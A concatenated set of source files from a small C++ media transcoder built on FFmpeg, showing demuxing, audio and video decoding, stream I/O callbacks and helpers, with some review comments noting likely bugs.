int main(int argc, char* argv[]) {
if(argc < 2) {
cout << "Usage: transPlus <filename>";
exit(255);
}
BasicConfigurator::doConfigure();
avcodec_register_all();
av_register_all();
string filename(argv[1]);
Logger logger = Logger::getInstance(LOG4CPLUS_TEXT("Main"));
LOG4CPLUS_INFO(logger, avcodec_configuration());
CodecList codecs = StreamFactory::getCodecList();
ContainerList containers = FFmpegEncodingContainer::getContainerList();
LOG4CPLUS_INFO(logger, "Configured with " << codecs.getCodecNames().size() << " codecs and " << containers.getContainers().size() << " containers");
LOG4CPLUS_INFO(logger, "Using file name " << filename);
ifstream src;
src.open(filename.c_str(), ios::binary);
StreamReader reader(src);
FFmpegDecodingContainer decoder(reader);
map<string, string> m = decoder.getFormat();
LOG4CPLUS_INFO(logger,
"Format of content stream is " << (*m.begin()).second);
ptr_vector<FFmpegStream> streams = decoder.getStreams();
ptr_vector<FFmpegStream>::iterator it;
for (it = streams.begin(); it < streams.end(); it++) {
LOG4CPLUS_INFO(logger, "Found stream " << it->getType() << " of codec " << it->getCodec());
}
decoder.runDecodeLoop();
}
<file_sep>/src/FFmpegDecodingContainer.hpp
/*
* DecodedDataObserver.h
*
* Created on: 31 Oct 2011
* Author: mediabag
*/
#ifndef FFMPEGDECODER_H_
#define FFMPEGDECODER_H_
#include "FFmpegContainer.hpp"
#include "events/DecodedDataObserver.hpp"
using namespace log4cplus;
using namespace std;
// Demuxing side of the pipeline: probes the container format and streams of
// the wrapped StreamReader and pushes decoded data to registered observers.
class FFmpegDecodingContainer: public FFmpegContainer {
	StreamReader& streamReader;          // input source (not owned)
	AVInputFormat *fmt;                  // demuxer selected by probing
	map<string, string> probeInfo;       // demuxer name -> long name
	AVIOContext *context;                // custom I/O bridging to streamReader
	boost::ptr_vector<DecodedDataObserver> observers; // owned observers
	unsigned char* buffer;               // I/O buffer handed to the AVIOContext
	void probeFormat();
	void probeStreams();
public:
	// NOTE(review): the parameter is taken by value while streamReader is a
	// reference member — confirm against the .cpp that the reference does not
	// end up bound to the (temporary) parameter.
	FFmpegDecodingContainer(StreamReader);
	virtual ~FFmpegDecodingContainer();
	// Probe results; populated during construction (see probeFormat).
	map<string, string> getFormat() {
		return probeInfo;
	}
	// Dispatch a decoded audio/video event to every registered observer.
	template <class DecodedDataType, class StreamType>
	void notifyObservers(Event<DecodedDataType, StreamType>& event);
	// Read packets until EOF, decoding each and notifying observers.
	void runDecodeLoop();
};
#endif /* FFMPEGDECODER_H_ */
<file_sep>/src/fixstdint.hpp
/*
* fixstdint.hpp
*
* Created on: 22 Sep 2011
* Author: mediabag
*/
#ifndef FIXSTDINT_HPP_
// Define the guard immediately (conventional placement); the old version
// defined it at the bottom, leaving the header unguarded against recursive
// inclusion while its body was still being processed.
#define FIXSTDINT_HPP_
#ifdef __cplusplus
// C++ only sees stdint.h's UINT64_C/INT64_C constant macros (which ffmpeg's
// headers need) when this macro is defined before inclusion.
#define __STDC_CONSTANT_MACROS
// If stdint.h was already included without the macro, drop its include guard
// so it is processed again with the constant macros enabled.
#ifdef _STDINT_H
#undef _STDINT_H
#endif
# include <stdint.h>
#endif
#endif /* FIXSTDINT_HPP_ */
<file_sep>/src/streams/FFmpegAudioStream.hpp
#ifndef FFMPEGAUDIOSTREAM_H_
#define FFMPEGAUDIOSTREAM_H_
#include "FFmpegStream.hpp"
// Holder for one buffer of decoded PCM samples.
class Sound {
	shared_ptr<uint8_t> data; // decoded sample bytes; empty pointer = no sound
public:
	Sound(shared_ptr<uint8_t> dt) :
		data(dt) {
	}
	// NOTE(review): wrapping a raw pointer in shared_ptr<uint8_t> releases it
	// with scalar delete. Sample buffers in FFmpegAudioStream.cpp come from
	// av_malloc, which must be freed with av_free — confirm no caller passes
	// such a buffer through this constructor.
	Sound(uint8_t* dt) :
		data(dt) {
	}
	virtual ~Sound() {
	}
	// Shared access to the raw sample bytes.
	shared_ptr<uint8_t> getData() {
		return data;
	}
};
// Audio specialisation of FFmpegStream: decodes packets into Sound buffers.
class FFmpegAudioStream: public FFmpegStream {
	// Allocates a sample buffer sized for the given packet (see .cpp).
	shared_ptr<uint8_t> checkAndAllocateSampleBuffer(AVPacket);
public:
	FFmpegAudioStream(AVStream*, AVFormatContext*, int streamIndex);
	virtual ~FFmpegAudioStream() {
	}
	virtual StreamType getType() {
		return AUDIO;
	}
	// Decode one packet into PCM; returns NoSound when nothing was produced.
	shared_ptr<Sound> decode(PacketPtr);
	// Covariant clone used by boost::ptr_vector's ownership machinery.
	FFmpegAudioStream* clone() const {
		return new FFmpegAudioStream(*this);
	}
};
// Sentinel returned by decode() when a packet yields no audible output.
// NOTE(review): being `static` in a header, each translation unit gets its
// own NoSound instance; comparisons across TUs compare different objects.
static shared_ptr<Sound> NoSound(new Sound(shared_ptr<uint8_t>()));
#endif
<file_sep>/src/events/Event.hpp
/*
* Event.hpp
*
* Created on: 25 May 2012
* Author: mediabag
*/
#ifndef EVENT_HPP_
#define EVENT_HPP_
#include <boost/shared_ptr.hpp>
#include <boost/bind.hpp>
#include "../FFmpeg.hpp"
#include "../streams/FFmpegAudioStream.hpp"
#include "../streams/FFmpegVideoStream.hpp"
/**
 * Couples one demuxed AVPacket with the stream it belongs to, so observers
 * can decode it on demand via decode().
 */
template<class DecodedDataType, class StreamType>
class Event {
protected:
	PacketPtr packet;   // heap copy of the packet, freed by destroy()
	StreamType stream;  // copy of the owning stream wrapper
public:
	// The packet is copied onto the heap before being handed to the shared
	// pointer: the previous code stored &p, the address of the by-value
	// constructor parameter, which dangles the moment the constructor
	// returns (and was later passed to av_free_packet — undefined behaviour).
	Event(AVPacket p, StreamType& fs) :
			packet(new AVPacket(p), boost::bind(&Event::destroy, this, _1)), stream(fs) {
	}
	virtual shared_ptr<DecodedDataType> decode() {
		return stream.decode(packet);
	}
	virtual ~Event() {
	}
	FFmpegStream& getStream() {
		return stream;
	}
	// Deleter for PacketPtr: release the packet's payload, then the heap
	// copy of the struct itself.
	// NOTE(review): the deleter is bound to `this`; if the Event dies while
	// getPacket() copies are still alive, the bound pointer is stale (benign
	// today since no members are touched, but a static helper would be safer).
	void destroy(AVPacket* pkt) {
		av_free_packet(pkt);
		delete pkt;
	}
	PacketPtr getPacket() {
		return packet;
	}
};

typedef Event<Picture, FFmpegVideoStream> VideoEvent;
typedef Event<Sound, FFmpegAudioStream> AudioEvent;
#endif /* EVENT_HPP_ */
<file_sep>/src/streams/StreamReader.cpp
/*
* StreamReader.cpp
*
* Created on: 22 Sep 2011
* Author: mediabag
*/
#include "StreamReader.hpp"
// Wrap an already-open input stream; the reader does not take ownership.
StreamReader::StreamReader(istream& input) :
		ios(input), logger(Logger::getInstance(LOG4CPLUS_TEXT("StreamReader"))) {
}

StreamReader::~StreamReader() {
}

// Reposition the wrapped stream at its start.
// NOTE(review): single-argument seekg expects an absolute *position*;
// passing the ios_base::beg direction constant relies on its numeric value
// being 0. seekg(0, ios_base::beg) would express the intent explicitly.
void StreamReader::rewind() {
	ios.seekg(ios_base::beg);
}
// AVIO-style read: fill buf with up to buf_size bytes, returning the number
// of bytes delivered, or EOF (-1) once the stream is exhausted.
int StreamReader::read(uint8_t *buf, int buf_size) {
	if (ios.eof()) {
		LOG4CPLUS_DEBUG(logger, "Read complete");
		return EOF;
	} else {
		ios.read(reinterpret_cast<char*>(buf), buf_size);
		// On a short (failed) read, report only the bytes actually obtained.
		int outcome = ios.fail() ? ios.gcount() : buf_size;
		LOG4CPLUS_DEBUG(logger,
				"Read asked " << buf_size << " read " << outcome);
		if (ios.fail() || ios.eof()) {
			// NOTE(review): basic_ios::clear(state) SETS the state to its
			// argument rather than clearing that bit. The net effect of these
			// two calls is rdstate == eofbit (failbit cleared), so the next
			// read() returns EOF. If the intent was to reset all flags,
			// ios.clear() alone would do it — confirm which was meant.
			ios.clear(std::ios_base::failbit);
			ios.clear(std::ios_base::eofbit);
		}
		return outcome;
	}
}
// AVIO-style seek: reposition the stream per whence (SEEK_SET/CUR/END) and
// return the resulting absolute position, or -1 on failure / unsupported
// operations (AVSEEK_SIZE is not supported, since the size is unknown).
int64_t StreamReader::seek(int64_t offset, int whence) {
	int result = -1;
	switch (whence) {
	case AVSEEK_SIZE:
		LOG4CPLUS_DEBUG(logger, "AVSEEK_SIZE");
		return -1;
	case SEEK_SET:
		if (offset < 0) {
			// Negative absolute offsets are rejected (result stays -1).
			LOG4CPLUS_DEBUG(logger,
					"SEEK_SET to negative offset of " << offset);
		} else {
			ios.seekg(offset, ios_base::beg);
			result = (ios.fail() || ios.eof() ? -1 : (int64_t) ((ios.tellg())));
			LOG4CPLUS_DEBUG( logger,
					"SEEK_SET to " << offset << " resulted in " << result);
		}
		break;
	case SEEK_CUR:
		// NOTE(review): if a previous operation left the stream in a failed
		// state, tellg() returns -1 here and the computed target is wrong;
		// error flags are also never cleared after a failed seek.
		ios.seekg(ios.tellg() + offset);
		result = (ios.fail() || ios.eof() ? -1 : (int64_t) ((ios.tellg())));
		LOG4CPLUS_DEBUG(logger, "SEEK_CUR to " << ios.tellg() + offset << " resulted in " << result);
		break;
	case SEEK_END:
		// offset is expected to be <= 0 relative to the end of the stream.
		ios.seekg(offset, ios_base::end);
		result = ios.fail() || ios.eof() ? -1 : (int64_t) (ios.tellg());
		LOG4CPLUS_DEBUG(
				logger,
				"SEEK_END resulted in " << result);
		break;
	default:
		LOG4CPLUS_DEBUG(logger, "Unknown whence " << whence);
		break;
	}
	return result;
}
int StreamReader::readFunction(void* opaque, uint8_t *buf, int buf_size) {
StreamReader *me = (StreamReader*) opaque;
return me->read(buf, buf_size);
}
// Static trampoline matching the AVIOContext seek-callback signature:
// recover the instance from the opaque pointer and forward the call.
int64_t StreamReader::seekFunction(void* opaque, int64_t offset, int whence) {
	return static_cast<StreamReader*>(opaque)->seek(offset, whence);
}
<file_sep>/src/events/DecodedDataObserver.hpp
/*
* DecodedDataObserver.hpp
*
* Created on: 1 Nov 2011
* Author: mediabag
*/
#ifndef DECODEDDATAOBSERVER_HPP_
#define DECODEDDATAOBSERVER_HPP_
#include <vector>
#include <boost/shared_ptr.hpp>
#include <boost/bind.hpp>
#include "../FFmpeg.hpp"
#include "../streams/FFmpegStream.hpp"
#include "Event.hpp"
using namespace std;
using namespace boost;
// Observer interface for decoded output: the decoding container calls one of
// the dataDecoded overloads for each audio/video event it produces.
// NOTE(review): the virtuals are declared (not pure) with bodies presumably
// in a .cpp; subclasses override whichever event type they care about.
class DecodedDataObserver {
public:
	DecodedDataObserver();
	virtual ~DecodedDataObserver();
public: // redundant second access specifier kept as-is
	virtual void dataDecoded(shared_ptr<AudioEvent> event);
	virtual void dataDecoded(shared_ptr<VideoEvent> event);
};
#endif /* DECODEDDATAOBSERVER_HPP_ */
<file_sep>/src/streams/FFmpegAudioStream.cpp
/*
* FFmpegAudioStream.cpp
*
* Created on: 3 Nov 2011
* Author: mediabag
*/
#include "FFmpegAudioStream.hpp"
// Forward everything to the base FFmpegStream, tagging the logger/stream
// name as "FFmpegAudioStream".
FFmpegAudioStream::FFmpegAudioStream(AVStream* avs, AVFormatContext* ctx, int streamIndex) :
		FFmpegStream(avs, ctx, "FFmpegAudioStream", streamIndex) {
}
// Decode one demuxed audio packet into raw PCM samples.
// Returns a Sound wrapping the sample buffer, or NoSound when the decoder
// produced no output for this packet. Throws (a heap-allocated)
// TranscodeException when avcodec reports a decode error.
shared_ptr<Sound> FFmpegAudioStream::decode(PacketPtr packet) {
	AVPacket* pkt = packet.get();
	adjustTimeStamps(*pkt);
	shared_ptr<uint8_t> samples = checkAndAllocateSampleBuffer(*pkt);
	int decodedDataSize = 0;
	/* XXX: could avoid copy if PCM 16 bits with same
	 endianness as CPU */
	int dataSize = avcodec_decode_audio3(avStream->codec, (int16_t*) samples.get(),
			&decodedDataSize, pkt);
	if (dataSize < 0) {
		// Build a readable diagnostic. The previous code appended the 64-bit
		// timestamps via string::operator+=, which converts them to single
		// chars and produced garbage; stream them into an ostringstream.
		std::ostringstream diag;
		diag << "Failed to decode audio dts=" << avStream->cur_dts
				<< " pts=" << avStream->pts.val << " - ";
		// NOTE(review): throwing by pointer matches the rest of the code
		// base, but catch sites must delete the exception.
		throw new TranscodeException(diag.str().c_str(), dataSize);
	}
	// avcodec_decode_audio3 returns the number of input bytes consumed.
	pkt->data += dataSize;
	pkt->size -= dataSize;
	/* Some bug in mpeg audio decoder gives */
	/* decoded_data_size < 0, it seems they are overflows */
	if (decodedDataSize > 0) {
		// TODO: advance next_pts from decodedDataSize (see ffmpeg.c), as the
		// original placeholder comment intended.
		LOG4CPLUS_DEBUG(logger,
				"Got audio dts=" << pkt->dts << " pts=" << pkt->pts);
		shared_ptr<Sound> sndPointer(new Sound(samples));
		return sndPointer;
	}
	return NoSound;
}
shared_ptr<uint8_t> FFmpegAudioStream::checkAndAllocateSampleBuffer(AVPacket pkt) {
int16_t* samples;
int sampleSize = 0;
int max = FFMAX(pkt.size*sizeof(*samples), AVCODEC_MAX_AUDIO_FRAME_SIZE);
if (sampleSize < max) {
sampleSize = max;
if (samples != NULL) {
av_free(samples);
}
samples = (int16_t*) av_malloc(sampleSize);
}
return shared_ptr<uint8_t>((uint8_t*)samples);
}
<file_sep>/src/TranscodeException.cpp
/*
* TranscodeException.cpp
*
* Created on: 25 Sep 2011
* Author: mediabag
*/
#include "TranscodeException.hpp"
TranscodeException::TranscodeException(string &m):msg(m) {
}
TranscodeException::TranscodeException(string &m, int avErrorCode):msg(m) {
if (avErrorCode < 0) {
append(avErrorCode);
}
}
TranscodeException::TranscodeException(int avErrorCode):msg() {
append(avErrorCode);
}
TranscodeException::TranscodeException():msg("A transcode exception occured") {
}
TranscodeException::TranscodeException(const char* cpmsg, int avErrorCode):msg(cpmsg) {
append(avErrorCode);
}
TranscodeException::TranscodeException(const char* cpmsg):msg() {
msg << cpmsg;
}
TranscodeException::TranscodeException(const TranscodeException& c):msg() {
msg << c.msg;
}
TranscodeException::~TranscodeException() throw () {
}
void TranscodeException::append(int avErrorCode) {
if (avErrorCode < 0) {
char *s = new char[1024];
av_strerror(avErrorCode, s, 1024);
msg << s << "(" << avErrorCode << ")";
delete s;
}
}
const char* TranscodeException::what() const throw () {
return msg.str().c_str();
}
<file_sep>/src/FFmpegContainer.cpp
/*
* FFmpegContainer.cpp
*
* Created on: 22 May 2012
* Author: mediabag
*/
#include "FFmpegContainer.hpp"
void checkForError(int code) {
if (code < 0) {
char* s = new char[1024];
av_strerror(code, s, 1024);
TranscodeException* t = new TranscodeException(s, code);
delete s;
throw t;
}
}
<file_sep>/src/streams/FFmpegVideoStream.cpp
/*
* FFmpegAudioStream.cpp
*
* Created on: 3 Nov 2011
* Author: mediabag
*/
#include "FFmpegVideoStream.hpp"
shared_ptr<Picture> FFmpegVideoStream::decode(PacketPtr packet) {
AVPacket& pkt = *packet;
adjustTimeStamps(pkt);
shared_ptr<AVFrame> pFrame(new AVFrame());
int gotPicture = 0;
if (pkt.size > 0) {
int decodedDataSize = (avStream->codec->width * avStream->codec->height
* 3) / 2;
/* XXX: allocate picture correctly */
avcodec_get_frame_defaults(pFrame.get());
int ret = avcodec_decode_video2(avStream->codec, pFrame.get(), &gotPicture,
&pkt);
avStream->quality = pFrame->quality;
if (ret < 0) {
string msg;
msg = "Failed to decode video dts=";
msg += avStream->cur_dts;
msg += " pts=";
msg += avStream->pts.val;
msg += " - ";
throw new TranscodeException(msg, ret);
}
if (gotPicture) {
// deal with the picture
LOG4CPLUS_DEBUG(logger,
"Got picture dts=" << pkt.dts << " pts=" << pkt.pts);
Picture* pict = new Picture(pFrame);
return shared_ptr<Picture>(pict);
}
// deal with this
// if (avStream->codec->time_base.num != 0) {
// int ticks = ist->st->parser ? ist->st->parser->repeat_pict + 1
// : ist->st->codec->ticks_per_frame;
// ist->next_pts += ((int64_t) AV_TIME_BASE
// * ist->st->codec->time_base.num * ticks)
// / ist->st->codec->time_base.den;
// }
}
return NoPicture;
}
<file_sep>/src/streams/StreamReader.hpp
/*
* StreamReader.h
*
* Created on: 22 Sep 2011
* Author: mediabag
*/
#ifndef STREAMREADER_H_
#include <iostream>
#include "../fixstdint.hpp"
#include <log4cplus/logger.h>
#include <log4cplus/configurator.h>
extern "C" {
#include <libavformat/avio.h>
}
#define STREAMREADER_H_
using namespace std;
using namespace log4cplus;
class StreamReader {
istream& ios;
Logger logger;
public:
StreamReader(istream& ios);
virtual ~StreamReader();
void rewind();
int read(uint8_t *buf, int buf_size);
int64_t seek(int64_t offset, int whence);
static int readFunction(void* opaque, uint8_t *buf, int buf_size);
static int64_t seekFunction(void* opaque, int64_t offset, int whence);
};
#endif /* STREAMREADER_H_ */
<file_sep>/src/FFmpegEncodingContainer.hpp
/*
* FFmpegEncoder.h
*
* Created on: 21 May 2012
* Author: mediabag
*/
#ifndef FFMPEGENCODER_H_
#define FFMPEGENCODER_H_
#include "FFmpegContainer.hpp"
#include "Helper.hpp"
class StreamFactory;
class FFmpegEncodingContainer: public FFmpegContainer {
private:
AVFormatContext* oc;
public:
static FFmpegEncodingContainer* makeContainer(string ct);
static ContainerList& getContainerList() {
static ContainerList containerList; // constructor runs once, when someone first needs it
return containerList;
}
FFmpegEncodingContainer(AVFormatContext* fc);
virtual ~FFmpegEncodingContainer();
string getContainerId();
string getContainerName();
friend class StreamFactory;
};
#endif /* FFMPEGENCODER_H_ */
<file_sep>/src/FFmpegDecodingContainer.cpp
/*
* FFmpegDecoder.cpp
*
* Created on: 1 Nov 2011
* Author: mediabag
*/
#include "FFmpegDecodingContainer.hpp"
FFmpegDecodingContainer::FFmpegDecodingContainer(StreamReader sr) :
FFmpegContainer(Logger::getInstance(LOG4CPLUS_TEXT("FFmpegDecoder"))), streamReader(
sr) {
probeFormat();
probeStreams();
}
FFmpegDecodingContainer::~FFmpegDecodingContainer() {
if (formatContext != NULL) {
av_close_input_stream(formatContext);
}
if (buffer != NULL) {
delete[] buffer;
}
}
void FFmpegDecodingContainer::probeFormat() {
u_int8_t* buffer = new u_int8_t[BUF_SIZE_ADJUSTED];
streamReader.rewind();
streamReader.read(buffer, BUF_SIZE);
streamReader.rewind();
AVProbeData *probeData = new AVProbeData;
probeData->buf = buffer;
probeData->buf_size = BUF_SIZE;
probeData->filename = "";
fmt = av_probe_input_format(probeData, 1);
delete[] buffer;
delete probeData;
if (fmt != NULL) {
LOG4CPLUS_DEBUG( logger,
"Probe successful: " << fmt->name << ": " << fmt->long_name);
probeInfo[string(fmt->name)] = string(fmt->long_name);
//fmt->flags |= AVFMT_NOFILE;
} else {
throw TranscodeException("Failed to probe format");
}
}
void FFmpegDecodingContainer::probeStreams() {
buffer = new unsigned char[BUF_SIZE_ADJUSTED];
context = avio_alloc_context(buffer, BUF_SIZE, 0, (void*) &streamReader,
StreamReader::readFunction, NULL, StreamReader::seekFunction);
context->buf_end = context->buf_ptr;
formatContext = avformat_alloc_context();
formatContext->pb = context;
int i = avformat_open_input(&formatContext, "", fmt, NULL);
if (i < 0) {
throw TranscodeException(i);
}
LOG4CPLUS_DEBUG(logger, "Format: " << string(formatContext->iformat->name));
AVStream** avStreams = formatContext->streams;
for (unsigned int i = 0; i < formatContext->nb_streams; i++) {
AVStream *stream = avStreams[i];
switch (stream->codec->codec_type) {
case AVMEDIA_TYPE_VIDEO:
LOG4CPLUS_DEBUG(logger, "Creating video stream");
ffStreams.push_back(
new FFmpegVideoStream(stream, formatContext, i));
break;
case AVMEDIA_TYPE_AUDIO:
LOG4CPLUS_DEBUG(logger, "Creating audio stream");
ffStreams.push_back(
new FFmpegAudioStream(stream, formatContext, i));
break;
case AVMEDIA_TYPE_DATA:
case AVMEDIA_TYPE_NB:
case AVMEDIA_TYPE_SUBTITLE:
case AVMEDIA_TYPE_UNKNOWN:
case AVMEDIA_TYPE_ATTACHMENT:
default:
LOG4CPLUS_DEBUG( logger,
"Unknown stream " << stream->codec->codec_type << " has to be ignored");
break;
}
}
LOG4CPLUS_INFO(logger, "Found " << ffStreams.size() << " streams");
}
template<class DecodedDataType, class StreamType>
void FFmpegDecodingContainer::notifyObservers(Event<DecodedDataType, StreamType>& event) {
}
void FFmpegDecodingContainer::runDecodeLoop() {
bool eof = false;
while (!eof) {
AVPacket pkt;
int ret = av_read_frame(formatContext, &pkt);
if (ret < 0) {
av_free_packet(&pkt);
if (ret != -32) {
char* s = new char[1024];
av_strerror(ret, s, 1024);
LOG4CPLUS_DEBUG(logger,
"Read frame failed: " << s << "[" << ret << "]");
delete s;
}
return;
}
if (ret == EAGAIN) {
LOG4CPLUS_WARN(logger, "Stream " << pkt.stream_index << " EAGAIN");
} else {
int streamIdx = pkt.stream_index;
if (streamIdx < ffStreams.size()) {
FFmpegStream& ffStream = ffStreams[streamIdx];
switch (ffStream.getType()) {
case AUDIO: {
FFmpegAudioStream& audioStream = dynamic_cast<FFmpegAudioStream&>(ffStream);
AudioEvent audioEvent(pkt, audioStream);
notifyObservers(audioEvent);
}
break;
case VIDEO: {
FFmpegVideoStream& videoStream = dynamic_cast<FFmpegVideoStream&>(ffStream);
VideoEvent videoEvent(pkt, videoStream);
notifyObservers(videoEvent);
}
break;
default:
break;
}
} else {
LOG4CPLUS_DEBUG(logger, "Ignoring new stream " << streamIdx);
}
}
}
}
<file_sep>/src/streams/StreamFactory.cpp
/*
* StreamFactory.cpp
*
* Created on: 21 May 2012
* Author: mediabag
*/
#include "StreamFactory.hpp"
//FFmpegVideoStream StreamFactory::makeVideoStream(
// FFmpegEncodingContainer container, int streamId, bool copy, int frameWidth, int frameHeight, float frameAspectRatio) {
// AVStream *st = st = av_new_stream(container.oc, streamId);
// if (!st) {
// throw new TranscodeException("Could not allocate copy stream");
// }
// st->stream_copy = 1;
// st->codec->codec_type = AVMEDIA_TYPE_VIDEO;
// st->codec->sample_aspect_ratio = st->sample_aspect_ratio = av_d2q(
// frameAspectRatio * frameHeight / frameWidth, 255);
// return FFmpegVideoStream(st, container.oc);
//}
//FFmpegVideoStream StreamFactory::makeVideoStream(string codec,
// int id, AVRational frameRate, int frameWidth, int frameHeight,
// PixelFormat framePixFmt) {
//
//}
<file_sep>/src/TranscodeException.hpp
/*
* TranscodeException.h
*
* Created on: 25 Sep 2011
* Author: mediabag
*/
#ifndef TRANSCODEEXCEPTION_H_
#include "fixstdint.hpp"
extern "C" {
#include <libavutil/avutil.h>
}
#define TRANSCODEEXCEPTION_H_
#include <exception>
#include <sstream>
using namespace std;
class TranscodeException: public std::exception {
stringstream msg;
void append(int avErrorCode);
public:
TranscodeException();
TranscodeException(const TranscodeException&);
TranscodeException(string &msg);
TranscodeException(int avErrorCode);
TranscodeException(string &msg, int avErrorCode);
TranscodeException(const char*, int avErrorCode);
TranscodeException(const char*);
virtual const char* what() const throw();
virtual ~TranscodeException() throw();
};
#endif /* TRANSCODEEXCEPTION_H_ */
<file_sep>/src/FFmpegEncodingContainer.cpp
/*
* FFmpegEncoder.cpp
*
* Created on: 21 May 2012
* Author: mediabag
*/
#include "FFmpegEncodingContainer.hpp"
string ContainerList::getContainer(string name) {
map<string, string>::iterator itr = formats.find(name);
if (itr != formats.end()) {
return itr->second;
} else {
return "";
}
}
map<string, string> ContainerList::getContainers() {
return formats;
}
FFmpegEncodingContainer::FFmpegEncodingContainer(AVFormatContext* fc) :
FFmpegContainer(Logger::getInstance(LOG4CPLUS_TEXT("FFmpegEncoder"))), oc(fc) {
// TODO Auto-generated constructor stub
}
FFmpegEncodingContainer::~FFmpegEncodingContainer() {
// TODO Auto-generated destructor stub
}
string FFmpegEncodingContainer::getContainerId() {
return string(oc->oformat->name);
}
string FFmpegEncodingContainer::getContainerName() {
return string(oc->oformat->long_name);
}
FFmpegEncodingContainer* FFmpegEncodingContainer::makeContainer(string ct) {
if (!getContainerList().getContainer(ct).empty()) {
AVFormatContext *oc;
int err = avformat_alloc_output_context2(&oc, (AVOutputFormat*) NULL,
ct.c_str(), NULL);
if (!oc) {
checkForError(err);
}
return new FFmpegEncodingContainer(oc);
} else {
return NULL;
}
}
<file_sep>/src/tests/FFmpegEncodingContainerTests.cpp
#include <gtest/gtest.h>
#include "../FFmpegEncodingContainer.hpp"
TEST(FFmpegEncodingContainer, ContainerFactory) {
FFmpegEncodingContainer* container = FFmpegEncodingContainer::makeContainer(
"webm");
ASSERT_TRUE(container != NULL);
ASSERT_STREQ("webm", container->getContainerId().c_str());
ASSERT_STREQ("WebM file format", container->getContainerName().c_str());
}
<file_sep>/src/streams/FFmpegVideoStream.hpp
#ifndef FFMPEGVIDEOSTREAM_H_
#define FFMPEGVIDEOSTREAM_H_
#include "FFmpegStream.hpp"
class Picture {
shared_ptr<AVFrame> picture;
public:
Picture(shared_ptr<AVFrame> sourcePic) :
picture(sourcePic) {
}
Picture(AVFrame* sourcePic) :
picture(sourcePic) {
}
virtual ~Picture() {
}
shared_ptr<AVFrame> getFrame() {
return picture;
}
};
class FFmpegVideoStream: public FFmpegStream {
public:
FFmpegVideoStream(AVStream* avs, AVFormatContext* afc, int streamIndex) :
FFmpegStream(avs, afc, "FFmpegVideoStream", streamIndex) {
}
virtual ~FFmpegVideoStream() {
}
virtual StreamType getType() {
return VIDEO;
}
shared_ptr<Picture> decode(PacketPtr);
FFmpegVideoStream* clone() const {
return new FFmpegVideoStream(*this);
}
};
static shared_ptr<Picture> NoPicture(new Picture(shared_ptr<AVFrame>()));
#endif
<file_sep>/src/tests/TestRunner.cpp
#include "../fixstdint.hpp"
#include <gtest/gtest.h>
#include <log4cplus/logger.h>
#include <log4cplus/configurator.h>
extern "C" {
#include <libavcodec/avcodec.h>
#include <libavformat/avformat.h>
}
using namespace log4cplus;
int main(int argc, char **argv) {
::testing::InitGoogleTest(&argc, argv);
BasicConfigurator::doConfigure();
avcodec_register_all();
av_register_all();
return RUN_ALL_TESTS();
}
<file_sep>/src/FFmpeg.hpp
/*
* FFmpeg.hpp
*
* Created on: 23 May 2012
* Author: mediabag
*/
#ifndef FFMPEG_HPP_
#define FFMPEG_HPP_
#include "fixstdint.hpp"
extern "C" {
#include <libavcodec/avcodec.h>
#include <libavformat/avformat.h>
}
#endif /* FFMPEG_HPP_ */
<file_sep>/src/FFmpegContainer.hpp
/*
* FFmpegProcessor.hpp
*
* Created on: 21 May 2012
* Author: mediabag
*/
#ifndef FFMPEGPROCESSOR_HPP_
#define FFMPEGPROCESSOR_HPP_
#include "FFmpeg.hpp"
#include <log4cplus/logger.h>
#include <log4cplus/configurator.h>
#include <boost/ptr_container/ptr_vector.hpp>
#include "streams/FFmpegStream.hpp"
#include "streams/FFmpegAudioStream.hpp"
#include "streams/FFmpegVideoStream.hpp"
#include "streams/StreamReader.hpp"
using namespace log4cplus;
using namespace std;
class FFmpegContainer {
protected:
const Logger logger;
AVFormatContext *formatContext;
AVIOContext *context;
boost::ptr_vector<FFmpegStream> ffStreams;
const static int BUF_SIZE = 4096;
const static int BUF_SIZE_ADJUSTED = 4096 + AVPROBE_PADDING_SIZE;
FFmpegContainer(const Logger& l) :
logger(l) {
formatContext = NULL;
context = NULL;
};
virtual ~FFmpegContainer() {
if (formatContext != NULL) {
avformat_free_context(formatContext);
}
if (context != NULL) {
av_free(context);
}
}
public:
boost::ptr_vector<FFmpegStream> getStreams() {
return ffStreams;
}
};
void checkForError(int code);
#endif /* FFMPEGPROCESSOR_HPP_ */
<file_sep>/src/Helper.cpp
/*
* Helper.cpp
*
* Created on: 23 May 2012
* Author: mediabag
*/
#include "Helper.hpp"
CodecID CodecList::resolveCodec(string name) {
return codecs.find(name)->second;
}
set<string> CodecList::getCodecNames() {
set<string> codecNames;
for(CodecResolverType::iterator it = codecs.begin(); it != codecs.end(); ++it) {
codecNames.insert(it->first);
}
return codecNames;
}
<file_sep>/src/Helper.hpp
/*
* Helper.cpp
*
* Created on: 23 May 2012
* Author: mediabag
*/
#ifndef HELPER_CPP_
#define HELPER_CPP_
#include "FFmpeg.hpp"
#include <map>
#include <string>
#include <set>
#include <log4cplus/logger.h>
#include <log4cplus/configurator.h>
using namespace std;
using namespace log4cplus;
class CodecList {
typedef map<CodecID, string> CodecNameType;
typedef map<string, CodecID> CodecResolverType;
Logger logger;
CodecNameType codecNames;
CodecResolverType codecs;
public:
CodecList() {
logger = Logger::getInstance(LOG4CPLUS_TEXT("CodecList"));
AVCodec *ac = av_codec_next(NULL);
while (ac) {
if (ac->long_name) {
codecNames[ac->id] = string(ac->long_name);
}
codecs[ac->name] = ac->id;
ac = av_codec_next(ac);
}
CodecNameType::const_iterator end = codecNames.end();
for (CodecNameType::const_iterator it = codecNames.begin(); it != end;
++it) {
LOG4CPLUS_DEBUG(logger, it->first << ": " << it->second);
}
}
CodecID resolveCodec(string name);
set<string> getCodecNames();
};
class ContainerList {
typedef map<string, string> FormatMapType;
Logger logger;
FormatMapType formats;
public:
ContainerList() {
logger = Logger::getInstance(LOG4CPLUS_TEXT("ContainerList"));
AVOutputFormat *af = av_oformat_next(NULL);
while (af) {
if (af->long_name) {
formats[af->name] = string(af->long_name);
}
af = av_oformat_next(af);
}
FormatMapType::const_iterator end = formats.end();
for (FormatMapType::const_iterator it = formats.begin(); it != end;
++it) {
LOG4CPLUS_DEBUG(logger, it->first << ": " << it->second);
}
}
string getContainer(string name);
map<string, string> getContainers();
};
#endif /* HELPER_CPP_ */
<file_sep>/src/streams/FFmpegStream.hpp
/*
* FFMpegStream.h
*
* Created on: 22 Sep 2011
* Author: mediabag
*/
#ifndef FFMPEGSTREAM_H_
#define FFMPEGSTREAM_H_
#include "../fixstdint.hpp"
#include <iostream>
#include <exception>
#include <queue>
#include "../TranscodeException.hpp"
#include <log4cplus/logger.h>
#include <log4cplus/configurator.h>
#include <boost/utility.hpp>
#include <boost/ptr_container/ptr_vector.hpp>
#include <boost/shared_ptr.hpp>
